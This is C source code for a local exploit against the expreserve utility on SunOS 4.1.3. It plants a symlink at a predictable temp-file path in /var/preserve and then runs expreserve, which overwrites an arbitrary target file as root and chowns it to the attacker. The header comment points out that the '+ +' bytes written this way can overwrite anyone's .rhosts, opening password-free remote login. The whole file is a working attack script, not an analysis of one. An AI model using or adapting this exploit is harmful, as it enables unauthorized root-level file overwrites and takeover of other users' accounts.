/* * Exploit a security hole in expreserve on sun4.1.3 * <program> filename * overwrites filename as root with garbage, chown's to you * (note, a 4.1.1 test overwrote with no chown * the first 4 characters written are "+ +\n" * which can be used to overwrite anyones .rhosts as root) * * Tim N. */ #include <pwd.h> #include <fcntl.h> #define HBLKS 2 #define FNSIZE 128 #define BLKS 900 typedef struct { time_t time; int uid; int flines; char name[FNSIZE]; short Blocks[BLKS]; short encrypted; } header; main(argc,argv) int argc; char **argv; { int p,u; header H; struct passwd *pw; char buf[100],*dest; if(argc!=2) { printf("usage: %s destination\n",argv[0]); exit(1); } dest = argv[1]; p = getpid(); pw = getpwuid(getuid()); sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p); symlink(dest,buf); close(0); if(open("./Ex",O_RDWR|O_CREAT,0666)<0) { printf("Cant open Ex (temp file)\n"); exit(2); } /* fill out header so that expre thinks its legit */ H.time = 12345; /* who cares */ strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/ strcpy(H.name,"NoName"); H.flines = 0; H.uid = getuid(); H.Blocks[0] = HBLKS; H.Blocks[1] = HBLKS+1; write(0,&H,sizeof(H)); lseek(0,0,0); printf("Made temp file 'Ex'. You can remove it when done.\n"); execl("/usr/lib/expreserve","expreserve",0); printf("Couldnt exec!\n"); }